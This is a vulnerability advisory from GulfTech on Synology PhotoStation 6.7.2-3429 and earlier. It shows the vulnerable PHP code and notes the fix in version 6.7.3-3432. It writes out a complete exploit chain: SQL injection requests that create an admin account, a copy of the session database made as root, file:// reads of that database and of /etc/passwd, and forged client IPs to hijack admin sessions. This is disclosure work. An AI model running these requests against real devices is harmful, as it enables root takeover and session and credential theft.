###########################################################################
                     ______      ____________          __  
                    / ____/_  __/ / __/_  __/__  _____/ /_ 
                   / / __/ / / / / /_  / / / _ \/ ___/ __ \
                  / /_/ / /_/ / / __/ / / /  __/ /__/ / / /         
                  \____/\__,_/_/_/   /_/  \___/\___/_/ /_/ 
                                                                
                     GulfTech Research and Development                                                                 

###########################################################################
#      Synology PhotoStation <= 6.7.2-3429 Multiple Vulnerabilities       #
###########################################################################
 

Released Date: 2018-01-08
Last Modified: 2017-07-22
 Company Info: Synology
 Version Info: 
              Vulnerable
               Synology PhotoStation <= 6.7.2-3429


--[ Table of contents

00 - Introduction
    00.1 Background

01 - SQL Injection
    01.1 - Vulnerable code analysis
    01.2 - Remote exploitation

02 - File Disclosure
    02.1 - Vulnerable code analysis
    02.2 - Remote exploitation

03 - Credit

04 - Proof of concept

05 - Solution

06 - Contact information


--[ 00 - Introduction

The purpose of this article is to detail the research that I have completed 
regarding Synology PhotoStation. The issues I have discovered can be used
in conjuction with one another to gain remote preauth root access to the
affected Synology NAS device.

--[ 00.1 - Background

The Synology Diskstation NAS by default installs several DSM applications
unless specified otherwise during setup. One of these default applications
installed is PhotoStation. PhotoStation is a web based photo manager.


--[ 01 - SQL Injection

There are a number of SQL Injection issues within the PhotoStation 
application. Since PhotoStation uses a PostgreSQL database exploitation is
trivial since multiple statements can easily be injected.

--[ 01.1 - Vulnerable code analysis

Below is vulnerable code from /photo/include/blog/label.php which takes GPC
data and uses it directly in an SQL query

---------------------------------------------------------------------------

if($_POST['action'] == 'get_all_labels') {
    echo SYNOBLOG_LABEL_GetLabelComboData($_POST['id']);
} else if($_POST['action'] == "get_article_label" && 
isset($_POST['article_id'])) {
    echo SYNOBLOG_LABEL_GetArticleRawLabel($_POST['article_id']);
} else if($_POST['action'] == "get_invalid_labels") {
    echo SYNOBLOG_LABEL_GetInvalidLabels();
}
---------------------------------------------------------------------------

Now let's have a look at any one of these functions.

---------------------------------------------------------------------------

function SYNOBLOG_LABEL_GetArticleRawLabel($article_id)
{
  global $blog_str_article_label_none;

    $query = "Select label_name from blog_article_label where article_id = 
    ".$article_id." order by label_name;";
    $db_result = PHOTO_DB_Query($query);

    while(($row = PHOTO_DB_FetchRow($db_result))) {
        if($row[0] == "no_label") {
            continue;
        }
        $result[] = $row[0];
    }

  return json_encode($result);
}

---------------------------------------------------------------------------

As you can see from the above code the SQL injection is fairly straight
forward as $article_id comes directly from the $_POST['article_id']
variable. In addition to this SQL Injection is also an SQL Injection within
the /photo/include/synotheme.php file within the SYNOTHEME_GET_BKG_PIC()
function due to the "type" parameter never being sanitized.

---------------------------------------------------------------------------

function SYNOTHEME_GET_BKG_PIC($mode, $type)
{
  $show_bkg_img_key = 'photo' === $type ? 'v6_show_bkg_img' : 
  'show_bkg_img';
  if (null == $show_bkg_img =  csSYNOPhotoMisc::GetConfigDB($mode, 
  $show_bkg_img_key, $type . '_config')) {
    csSYNOPhotoMisc::UpdateConfigDB('theme', $show_bkg_img_key, '3', 
    $type . '_config');
    $show_bkg_img = '3';
  }

---------------------------------------------------------------------------

In the above code the "type" variable is used to specify the table name
within an SQL query. Unfortunately this "type" parameter is taken directly 
from GPC data and never sanitized. No authentication is needed to exploit
either of the previously mentioned SQL Injection vulnerabilities.

--[ 01.2 - Remote exploitation

Exploiting this issue is trivial, and can be achieved by simply sending a 
post request containing a SQL Injection string within the "article_id"
parameter.

---------------------------------------------------------------------------

POST /photo/include/blog/label.php HTTP/1.1
Host: diskstation
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0)
Accept: */*
Accept-Language: en-US,en;q=0.5
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://diskstation/blog/
Content-Length: 60
Connection: close

action=get_article_label&article_id=1; SELECT version(); -- 

---------------------------------------------------------------------------

The above request would successfully return the version of the PostgreSQL 
database to the attacker. However, it is also possible to gain a remote 
root shell with a decent bit of work by using the following steps.

##[ STEP 00: 
First we have to leverage the SQL Injection to enable the PhotoStation 
authentication system. By default the PhotoStation application uses DSM to 
authenticate. We need to change this so that it uses PhotoStation to 
authenticate. This can be accomplished with the following query.

---------------------------------------------------------------------------

UPDATE photo_config SET config_value=0 WHERE config_key='account_system';

---------------------------------------------------------------------------

Now the PhotoStation authentication system should be successfully enabled 
and ready for use. 

##[ STEP 01: 

Once the PhotoStation authentication system is successfully enabled we can 
create an admin user and authenticate as this user to escalate our current
privileges from PhotoStation admin to root.

---------------------------------------------------------------------------

INSERT INTO photo_user (userid, username, password, admin) VALUES (42, 
'test', '098f6bcd4621d373cade4e832627b4f6', TRUE);

---------------------------------------------------------------------------

We now can login as the admin user "test" with the password "test".

##[ STEP 02:

The next step is to create a "video" record with a malicious "path" value 
via SQL Injection. This "path" value holds the location of the file we want 
to disclose as the root user. The PhotoStation admin panel is fairly secure 
and does not give us many options for exploiting file handling issues. 
However, the PhotoStation application trusts the "path" data taken 
from the database when copying files, and does not validate it. We can 
leverage this lack of sanity checks to copy any files we want as root to 
the default photo directory. 

---------------------------------------------------------------------------

INSERT INTO video (id, path, title, container_type) VALUES (42, 
'/usr/syno/etc/private/session/current.users', 'test', 'test');

---------------------------------------------------------------------------

The above record inserted would allow an attacker to copy the sessions db 
to the default photo directory once a file copy operation is triggered by 
the album_util.php script. This is because the copy and move operations use
the "path" data taken from the database as the source argument. This file
will be copied with root permissions by the "synphotoio" binary.

##[ STEP 03:

The next step for us is to trigger a file copy operation via album_util.php 
where our malicious "path" value will be used by the "synphotoio" binary to 
make a copy of the file as root in the default photo directory.

---------------------------------------------------------------------------

POST /photo/include/photo/album_util.php HTTP/1.1
Host: diskstation
User-Agent: Mozilla/5.0 
Accept: */*
Accept-Language: en-US,en;q=0.5
X-SYNO-TOKEN: ambru48o5nm3kpcla82j1b98s4
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://diskstation/photo/
Content-Length: 45
Cookie: stay_login=1; PHPSESSID=c4kclpg4j3bndcpuq4pvs9of10;
Connection: close

action=copy_items&video_list=42&destination=2f

---------------------------------------------------------------------------

The above request will successfully copy the user sessions database to the
default photo directory. We just have to make sure the "video_list" ID
corresponds to the ID that we previously inserted into the database so that
the "path" data we specified will be used in the file copy operation.

##[ STEP 04:

For the next step we have to be slick and use a file handling bug in the 
file_upload.php script to copy the file disclosed by root to the web 
directory for viewing. The only reason we are able to accomplish this is 
because we're allowed to specify the full URL sent to a file_get_contents() 
call. We could also use this bug to read any file that the web server has 
access to. But, for now we will just copy the file we recently disclosed as 
root since these particular file handling operations take place as an 
unprivileged user and would limit the attacker impact greatly.

---------------------------------------------------------------------------

POST /photo/include/file_upload.php?dir=2f2e2e2f4061707073746f72652f50686f7
46f53746174696f6e2f70686f746f2f&name=1/&fname=pwn&sid=ambru48o5nm3 HTTP/1.1
Host: diskstation
User-Agent: Mozilla/5.0 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: PHPSESSID=ambru48o5nm3; photo_remember_me=1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 57

action=aviary_add&url=file:///volume1/photo/current.users

---------------------------------------------------------------------------

As you can see from the above request we are allow to specify a file:// URL
and as a result copy the disclosed sessions db to the web directory as a 
file named pwn.jpg and view all admin sessions. If it was not for this file
handling bug in file_upload.php an attacker would have to access the file 
via SMB or some other method thus making the attack much more complicated.

##[ STEP 05:

Once we have the sessions database we now have the session ID and IP
addresses of administrators. We can use this information to now login to
the DSM as an admin. It is possible to use headers such as "Client-IP" to 
successfully forge the IP address of the stolen session data. So, the fact 
that sessions are restricted by IP address does not really matter at all in
this particular case.

At this point it is game over as DSM admin users are able to run commands
as root and have complete and total access to the entire system.


--[ 02 - File Disclosure

PhotoStation is vulnerable to a file disclosure issue. This issue is due to
an unsafe file_get_contents() call within the SYNOPHOTO_AVIARY_Add() 
function that allows an attacker to specify the full URL used.

--[ 01.1 - Vulnerable code analysis

Below is vulnerable code from /photo/include/file_upload.php which makes 
use of a user supplied URL to populate the contents of $image_data.

---------------------------------------------------------------------------

$image_data = file_get_contents($_REQUEST['url']);

---------------------------------------------------------------------------

The above code allows authenticated users to easily disclose file contents
with the privilege of the web server, or to possibly conduct SSRF attacks 
against the internal network.

--[ 01.2 - Remote exploitation

Exploiting the issue requires user authentication, but other than that it
is fairly trivial to take advantage of. Also, it should be noted that the
required authentication can be acquired by using the previously mentioned
SQL Injection issues in order to create arbitrary user accounts.

---------------------------------------------------------------------------

POST /photo/include/file_upload.php?dir=2f2e2e2f4061707073746f72652f50686f7
46f53746174696f6e2f70686f746f2f&name=1/&fname=pwn&sid=ambru48o5nm3 HTTP/1.1
Host: diskstation
User-Agent: Mozilla/5.0 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: PHPSESSID=ambru48o5nm3; photo_remember_me=1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 57

action=aviary_add&url=file:///etc/passwd

---------------------------------------------------------------------------

The above request would successfully copy the contents of the passwd file
to http://diskstation/photo/pwn.jpg where it's contents could be viewed by 
the attacker.


--[ 03 - Credit

James Bercegay
GulfTech Research and Development


--[ 04 - Proof of concept

We strive to do our part to contribute to the security community.
Metasploit modules for issues outlined in this paper can be found online.


--[ 05 - Solution

These issues were addressed in update 6.7.3-3432

--[ 06 - Contact information

Web
https://gulftech.org/

Mail
security@gulftech.org


Copyright 2018 GulfTech Research and Development. All rights reserved.